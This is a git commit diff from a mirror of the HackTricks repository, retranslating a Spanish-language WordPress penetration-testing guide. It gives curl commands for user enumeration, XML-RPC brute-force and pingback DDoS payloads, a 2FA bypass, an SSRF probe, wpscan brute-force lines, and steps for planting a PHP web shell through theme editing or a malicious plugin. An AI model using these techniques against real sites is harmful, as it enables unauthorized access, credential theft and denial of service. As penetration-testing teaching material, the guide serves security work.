mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 22:18:27 +00:00
Translated ['network-services-pentesting/pentesting-web/wordpress.md'] t
This commit is contained in:
parent
797685e747
commit
9aeb1f4675
1 changed files with 65 additions and 55 deletions
|
@ -7,18 +7,18 @@
|
|||
Otras formas de apoyar a HackTricks:
|
||||
|
||||
* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||||
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Obtén la [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) en GitHub.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Utiliza [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y **automatizar flujos de trabajo** fácilmente con las herramientas comunitarias más avanzadas del mundo.\
|
||||
¡Accede hoy mismo:
|
||||
Accede hoy mismo:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
|
@ -42,15 +42,15 @@ Rutas de inicio de sesión predeterminadas para verificar: _**/wp-login.php, /wp
|
|||
* `/wp-admin/wp-login.php`
|
||||
* `/login.php`
|
||||
* `/wp-login.php`
|
||||
* `xmlrpc.php` es un archivo que representa una característica de WordPress que permite transmitir datos con HTTP actuando como mecanismo de transporte y XML como mecanismo de codificación. Este tipo de comunicación ha sido reemplazado por la [API REST](https://developer.wordpress.org/rest-api/reference) de WordPress.
|
||||
* `xmlrpc.php` es un archivo que representa una característica de WordPress que permite que los datos se transmitan con HTTP actuando como mecanismo de transporte y XML como mecanismo de codificación. Este tipo de comunicación ha sido reemplazado por la [API REST](https://developer.wordpress.org/rest-api/reference) de WordPress.
|
||||
* La carpeta `wp-content` es el directorio principal donde se almacenan los plugins y temas.
|
||||
* `wp-content/uploads/` es el directorio donde se almacenan los archivos subidos a la plataforma.
|
||||
* `wp-includes/` Este es el directorio donde se almacenan los archivos principales, como certificados, fuentes, archivos JavaScript y widgets.
|
||||
* `wp-sitemap.xml` En las versiones de Wordpress 5.5 y superiores, Wordpress genera un archivo XML de mapa del sitio con todas las publicaciones públicas y tipos de publicaciones y taxonomías públicamente consultables.
|
||||
* `wp-sitemap.xml` En las versiones de Wordpress 5.5 y superiores, Wordpress genera un archivo XML de sitemap con todas las publicaciones públicas y tipos de publicaciones y taxonomías públicamente consultables.
|
||||
|
||||
**Explotación Post**
|
||||
|
||||
* El archivo `wp-config.php` contiene la información requerida por WordPress para conectarse a la base de datos, como el nombre de la base de datos, el host de la base de datos, el nombre de usuario y la contraseña, claves de autenticación y sales, y el prefijo de la tabla de la base de datos. Este archivo de configuración también se puede utilizar para activar el modo DEBUG, que puede ser útil para solucionar problemas.
|
||||
* El archivo `wp-config.php` contiene la información requerida por WordPress para conectarse a la base de datos, como el nombre de la base de datos, el host de la base de datos, el nombre de usuario y la contraseña, claves de autenticación y sales, y el prefijo de la tabla de la base de datos. Este archivo de configuración también se puede utilizar para activar el modo DEBUG, lo cual puede ser útil para la solución de problemas.
|
||||
|
||||
### Permisos de Usuarios
|
||||
|
||||
|
@ -74,15 +74,15 @@ curl https://victim.com/ | grep 'content="WordPress'
|
|||
```
|
||||
* `meta name`
|
||||
|
||||
![](<../../.gitbook/assets/image (343).png>)
|
||||
![](<../../.gitbook/assets/image (1108).png>)
|
||||
|
||||
* Archivos de enlace CSS
|
||||
|
||||
![](<../../.gitbook/assets/image (344).png>)
|
||||
![](<../../.gitbook/assets/image (530).png>)
|
||||
|
||||
* Archivos de JavaScript
|
||||
|
||||
![](<../../.gitbook/assets/image (346).png>)
|
||||
![](<../../.gitbook/assets/image (521).png>)
|
||||
|
||||
### Obtener Plugins
|
||||
|
||||
|
@ -90,22 +90,26 @@ curl https://victim.com/ | grep 'content="WordPress'
|
|||
```bash
|
||||
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### Obtener Temas
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### Extraer versiones en general
|
||||
|
||||
{% endcode %}
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
|
||||
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Utilice [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y **automatizar flujos de trabajo** fácilmente con las herramientas comunitarias más avanzadas del mundo.\
|
||||
|
@ -117,13 +121,13 @@ Obtenga acceso hoy:
|
|||
|
||||
### Plugins y Temas
|
||||
|
||||
Probablemente no podrás encontrar todos los Plugins y Temas posibles. Para descubrir todos ellos, necesitarás **realizar un Brute Force activo en una lista de Plugins y Temas** (afortunadamente, existen herramientas automatizadas que contienen estas listas).
|
||||
Probablemente no podrás encontrar todos los Plugins y Temas posibles. Para descubrir todos ellos, necesitarás **realizar un Brute Force activo de una lista de Plugins y Temas** (afortunadamente existen herramientas automatizadas que contienen estas listas).
|
||||
|
||||
### Usuarios
|
||||
|
||||
**ID Brute**
|
||||
|
||||
Obtén usuarios válidos de un sitio de WordPress realizando un Brute Force en los IDs de usuarios:
|
||||
Puedes obtener usuarios válidos de un sitio de WordPress realizando un Brute Force de los IDs de usuarios:
|
||||
```
|
||||
curl -s -I -X GET http://blog.example.com/?author=1
|
||||
```
|
||||
|
@ -139,9 +143,9 @@ Otro endpoint `/wp-json/` que puede revelar información sobre los usuarios es:
|
|||
```
|
||||
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
|
||||
```
|
||||
Este endpoint solo expone a los usuarios que han realizado una publicación. **Solo se proporcionará información sobre los usuarios que tengan esta función habilitada**.
|
||||
Tenga en cuenta que este endpoint solo expone a los usuarios que han realizado una publicación. **Solo se proporcionará información sobre los usuarios que tengan esta función habilitada**.
|
||||
|
||||
También ten en cuenta que **/wp-json/wp/v2/pages** podría filtrar direcciones IP.
|
||||
También tenga en cuenta que **/wp-json/wp/v2/pages** podría filtrar direcciones IP.
|
||||
|
||||
#### Enumeración de nombres de usuario de inicio de sesión
|
||||
|
||||
|
@ -149,11 +153,11 @@ Al iniciar sesión en **`/wp-login.php`** el **mensaje** es **diferente** si el
|
|||
|
||||
### XML-RPC
|
||||
|
||||
Si `xml-rpc.php` está activo, puedes realizar un ataque de fuerza bruta de credenciales o utilizarlo para lanzar ataques de denegación de servicio (DoS) a otros recursos. (Puedes automatizar este proceso [usando esto](https://github.com/relarizky/wpxploit) por ejemplo).
|
||||
Si `xml-rpc.php` está activo, puede realizar un ataque de fuerza bruta de credenciales o utilizarlo para lanzar ataques de denegación de servicio (DoS) a otros recursos. (Puede automatizar este proceso [usando esto](https://github.com/relarizky/wpxploit) por ejemplo).
|
||||
|
||||
Para verificar si está activo, intenta acceder a _**/xmlrpc.php**_ y envía esta solicitud:
|
||||
Para ver si está activo, intente acceder a _**/xmlrpc.php**_ y envíe esta solicitud:
|
||||
|
||||
**Check**
|
||||
**Comprobar**
|
||||
```markup
|
||||
<methodCall>
|
||||
<methodName>system.listMethods</methodName>
|
||||
|
@ -176,7 +180,11 @@ Para verificar si está activo, intenta acceder a _**/xmlrpc.php**_ y envía est
|
|||
```
|
||||
El mensaje _"Nombre de usuario o contraseña incorrectos"_ dentro de una respuesta de código 200 debería aparecer si las credenciales no son válidas.
|
||||
|
||||
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1
|
||||
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
|
||||
|
||||
![](<../../.gitbook/assets/image (718).png>)
|
||||
|
||||
Usando las credenciales correctas puedes subir un archivo. En la respuesta aparecerá la ruta ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
|
||||
```markup
|
||||
<?xml version='1.0' encoding='utf-8'?>
|
||||
<methodCall>
|
||||
|
@ -206,18 +214,18 @@ El mensaje _"Nombre de usuario o contraseña incorrectos"_ dentro de una respues
|
|||
</params>
|
||||
</methodCall>
|
||||
```
|
||||
También hay una **forma más rápida** de probar credenciales usando **`system.multicall`** ya que puedes intentar varias credenciales en la misma solicitud:
|
||||
También hay una **forma más rápida** de probar credenciales mediante **`system.multicall`** ya que puedes intentar varias credenciales en la misma solicitud:
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (188).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (625).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**Burlar la autenticación de dos factores (2FA)**
|
||||
|
||||
Este método está destinado para programas y no para humanos, y es antiguo, por lo tanto no es compatible con 2FA. Por lo tanto, si tienes credenciales válidas pero la entrada principal está protegida por 2FA, **podrías abusar de xmlrpc.php para iniciar sesión con esas credenciales evitando el 2FA**. Ten en cuenta que no podrás realizar todas las acciones que puedes hacer a través de la consola, pero aún podrías lograr RCE como lo explica Ippsec en [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s)
|
||||
Este método está destinado a programas y no a humanos, y es antiguo, por lo tanto no es compatible con 2FA. Por lo tanto, si tienes credenciales válidas pero la entrada principal está protegida por 2FA, **podrías abusar de xmlrpc.php para iniciar sesión con esas credenciales evitando el 2FA**. Ten en cuenta que no podrás realizar todas las acciones que puedes hacer a través de la consola, pero aún podrías lograr RCE como lo explica Ippsec en [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s)
|
||||
|
||||
**DDoS o escaneo de puertos**
|
||||
|
||||
Si puedes encontrar el método _**pingback.ping**_ en la lista, puedes hacer que Wordpress envíe una solicitud arbitraria a cualquier host/puerto.\
|
||||
Esto se puede utilizar para pedir a **miles** de **sitios** de **Wordpress** que **accedan** a una **ubicación** específica (causando un **DDoS** en esa ubicación) o puedes usarlo para hacer que **Wordpress** escanee alguna **red interna** (puedes indicar cualquier puerto).
|
||||
Esto se puede utilizar para pedir a **miles** de **sitios** de **Wordpress** que **accedan** a una **ubicación** específica (causando un **DDoS** en esa ubicación) o puedes usarlo para hacer que **Wordpress** **escanee** alguna red interna (puedes indicar cualquier puerto).
|
||||
```markup
|
||||
<methodCall>
|
||||
<methodName>pingback.ping</methodName>
|
||||
|
@ -243,23 +251,23 @@ Echa un vistazo al uso de **`system.multicall`** en la sección anterior para ap
|
|||
</params>
|
||||
</methodCall>
|
||||
```
|
||||
![](<../../.gitbook/assets/image (103).png>)
|
||||
![](<../../.gitbook/assets/image (107).png>)
|
||||
|
||||
### wp-cron.php DoS
|
||||
|
||||
Este archivo suele existir en la raíz del sitio de Wordpress: **`/wp-cron.php`**\
|
||||
Este archivo generalmente se encuentra en la raíz del sitio de Wordpress: **`/wp-cron.php`**\
|
||||
Cuando este archivo es **accedido** se realiza una **consulta** MySQL "**pesada**", por lo que podría ser utilizado por **atacantes** para **causar** un **DoS**.\
|
||||
Además, por defecto, el `wp-cron.php` se llama en cada carga de página (cada vez que un cliente solicita cualquier página de Wordpress), lo que en sitios con mucho tráfico puede causar problemas (DoS).
|
||||
Además, de forma predeterminada, el `wp-cron.php` se llama en cada carga de página (cada vez que un cliente solicita cualquier página de Wordpress), lo que en sitios con mucho tráfico puede causar problemas (DoS).
|
||||
|
||||
Se recomienda deshabilitar Wp-Cron y crear una tarea cron real dentro del host que realice las acciones necesarias en un intervalo regular (sin causar problemas).
|
||||
|
||||
### /wp-json/oembed/1.0/proxy - SSRF
|
||||
|
||||
Intenta acceder a _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ y el sitio de Wordpress puede hacer una solicitud hacia ti.
|
||||
Intenta acceder a _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ y el sitio de Wordpress puede hacer una solicitud a ti.
|
||||
|
||||
Esta es la respuesta cuando no funciona:
|
||||
|
||||
![](<../../.gitbook/assets/image (184) (1).png>)
|
||||
![](<../../.gitbook/assets/image (362).png>)
|
||||
|
||||
### SSRF
|
||||
|
||||
|
@ -273,17 +281,17 @@ cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x6
|
|||
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
|
||||
#You can try to bruteforce the admin user using wpscan with "-U admin"
|
||||
```
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Utilice [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) para construir y **automatizar flujos de trabajo** fácilmente con las herramientas comunitarias **más avanzadas** del mundo.\
|
||||
Utilice [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) para construir y **automatizar flujos de trabajo** fácilmente con las herramientas comunitarias más avanzadas del mundo.\
|
||||
Obtenga acceso hoy:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
## Obtenga acceso sobrescribiendo un bit
|
||||
|
||||
Más que un ataque real, esto es una curiosidad. En el CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) podrías cambiar 1 bit de cualquier archivo de Wordpress. Así podrías cambiar la posición `5389` del archivo `/var/www/html/wp-includes/user.php` para anular la operación NOT (`!`).
|
||||
Más que un ataque real, esto es una curiosidad. En el CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) podría cambiar 1 bit de cualquier archivo de wordpress. Así que podría cambiar la posición `5389` del archivo `/var/www/html/wp-includes/user.php` para anular la operación NOT (`!`).
|
||||
```php
|
||||
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
|
||||
return new WP_Error(
|
||||
|
@ -296,7 +304,7 @@ Apariencia → Editor de Temas → Plantilla 404 (a la derecha)
|
|||
|
||||
Cambiar el contenido por un shell php:
|
||||
|
||||
![](<../../.gitbook/assets/image (21) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (381).png>)
|
||||
|
||||
Busca en internet cómo puedes acceder a esa página actualizada. En este caso, debes acceder aquí: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
||||
|
||||
|
@ -306,38 +314,40 @@ Puedes usar:
|
|||
```
|
||||
use exploit/unix/webapp/wp_admin_shell_upload
|
||||
```
|
||||
## Ejecución de código remoto a través de plugins
|
||||
## Plugin RCE
|
||||
|
||||
### Plugin PHP
|
||||
### Plugin RCE
|
||||
|
||||
### Plugin RCE
|
||||
|
||||
Puede ser posible subir archivos .php como un plugin.\
|
||||
Cree su puerta trasera en php utilizando, por ejemplo:
|
||||
Cree su puerta trasera php usando por ejemplo:
|
||||
|
||||
![](<../../.gitbook/assets/image (407).png>)
|
||||
![](<../../.gitbook/assets/image (180).png>)
|
||||
|
||||
Luego agregue un nuevo plugin:
|
||||
|
||||
![](<../../.gitbook/assets/image (409).png>)
|
||||
![](<../../.gitbook/assets/image (719).png>)
|
||||
|
||||
Suba el plugin y presione Instalar ahora:
|
||||
|
||||
![](<../../.gitbook/assets/image (411).png>)
|
||||
![](<../../.gitbook/assets/image (246).png>)
|
||||
|
||||
Haga clic en Proceder:
|
||||
|
||||
![](<../../.gitbook/assets/image (412).png>)
|
||||
![](<../../.gitbook/assets/image (67).png>)
|
||||
|
||||
Probablemente esto no haga nada aparentemente, pero si va a Medios, verá su shell subido:
|
||||
Probablemente esto no haga nada aparentemente, pero si va a Medios, verá su shell subida:
|
||||
|
||||
![](<../../.gitbook/assets/image (413).png>)
|
||||
![](<../../.gitbook/assets/image (459).png>)
|
||||
|
||||
Acceda a él y verá la URL para ejecutar la shell inversa:
|
||||
|
||||
![](<../../.gitbook/assets/image (414).png>)
|
||||
![](<../../.gitbook/assets/image (1003).png>)
|
||||
|
||||
### Subir y activar un plugin malicioso
|
||||
### Subir y activar plugin malicioso
|
||||
|
||||
Este método implica la instalación de un plugin malicioso conocido por ser vulnerable y que puede ser explotado para obtener una shell web. Este proceso se realiza a través del panel de WordPress de la siguiente manera:
|
||||
Este método implica la instalación de un plugin malicioso conocido por ser vulnerable y que puede ser explotado para obtener una shell web. Este proceso se lleva a cabo a través del panel de WordPress de la siguiente manera:
|
||||
|
||||
1. **Adquisición del Plugin**: El plugin se obtiene de una fuente como Exploit DB como [**aquí**](https://www.exploit-db.com/exploits/36374).
|
||||
2. **Instalación del Plugin**:
|
||||
|
@ -346,8 +356,8 @@ Este método implica la instalación de un plugin malicioso conocido por ser vul
|
|||
3. **Activación del Plugin**: Una vez que el plugin se instala correctamente, debe ser activado a través del panel.
|
||||
4. **Explotación**:
|
||||
* Con el plugin "reflex-gallery" instalado y activado, puede ser explotado ya que se sabe que es vulnerable.
|
||||
* El framework Metasploit proporciona un exploit para esta vulnerabilidad. Cargando el módulo adecuado y ejecutando comandos específicos, se puede establecer una sesión de meterpreter, otorgando acceso no autorizado al sitio.
|
||||
* Se destaca que este es solo uno de los muchos métodos para explotar un sitio de WordPress.
|
||||
* El framework Metasploit proporciona un exploit para esta vulnerabilidad. Cargando el módulo apropiado y ejecutando comandos específicos, se puede establecer una sesión de meterpreter, otorgando acceso no autorizado al sitio.
|
||||
* Se señala que este es solo uno de los muchos métodos para explotar un sitio de WordPress.
|
||||
|
||||
El contenido incluye ayudas visuales que representan los pasos en el panel de WordPress para instalar y activar el plugin. Sin embargo, es importante tener en cuenta que explotar vulnerabilidades de esta manera es ilegal e inmoral sin la autorización adecuada. Esta información debe ser utilizada de manera responsable y solo en un contexto legal, como pruebas de penetración con permiso explícito.
|
||||
|
||||
|
@ -383,17 +393,17 @@ También, **solo instala plugins y temas de WordPress confiables**.
|
|||
|
||||
### **Otras Recomendaciones**
|
||||
|
||||
* Elimina el usuario **admin** por defecto
|
||||
* Utiliza **contraseñas fuertes** y **2FA**
|
||||
* Revisa periódicamente los **permisos** de los usuarios
|
||||
* **Limita los intentos de inicio de sesión** para prevenir ataques de Fuerza Bruta
|
||||
* Renombra el archivo **`wp-admin.php`** y solo permite el acceso internamente o desde ciertas direcciones IP.
|
||||
* Eliminar el usuario **admin** por defecto
|
||||
* Utilizar **contraseñas fuertes** y **2FA**
|
||||
* Revisar periódicamente los **permisos** de los usuarios
|
||||
* **Limitar los intentos de inicio de sesión** para prevenir ataques de Fuerza Bruta
|
||||
* Renombrar el archivo **`wp-admin.php`** y permitir el acceso solo internamente o desde ciertas direcciones IP.
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Utiliza [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y **automatizar flujos de trabajo** fácilmente con las herramientas comunitarias más avanzadas del mundo.\
|
||||
¡Accede hoy:
|
||||
Obtén Acceso Hoy:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
|
@ -404,7 +414,7 @@ Utiliza [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_mediu
|
|||
Otras formas de apoyar a HackTricks:
|
||||
|
||||
* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||||
* Obtén la [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
|
Loading…
Add table
Reference in a new issue